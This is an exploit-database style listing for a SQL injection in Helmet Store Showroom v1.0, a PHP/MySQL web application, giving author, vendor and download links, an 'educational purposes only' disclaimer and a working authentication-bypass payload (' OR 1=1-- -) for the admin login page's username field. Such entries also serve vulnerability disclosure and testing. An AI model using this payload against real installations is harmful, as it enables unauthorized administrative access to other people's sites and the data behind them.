Helmet store showroom v1.0 sql injection Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2023-03-29 |
Type : webapps |
Platform : php
This exploit / vulnerability Helmet store showroom v1.0 sql injection is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Helmet Store Showroom v1.0 - SQL Injection
# Exploit Author: Ameer Hamza
# Date: November 15, 2022
# Vendor Homepage: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=15851&title=Helmet+Store+Showroom+Site+in+PHP+and+MySQL+Free+Source+Code
# Tested on: Kali Linux, Apache, Mysql
# Vendor: oretnom23
# Version: v1.0
# Exploit Description:
# Helmet Store Showroom v1.0 suffers from SQL injection on the login page which leads to authentication bypass of the admin account.
[+] The username parameter is vulnerable to SQLi in login page
[+] URL --> http://localhost/hss/admin/login.php
[+] Username = ' OR 1=1-- -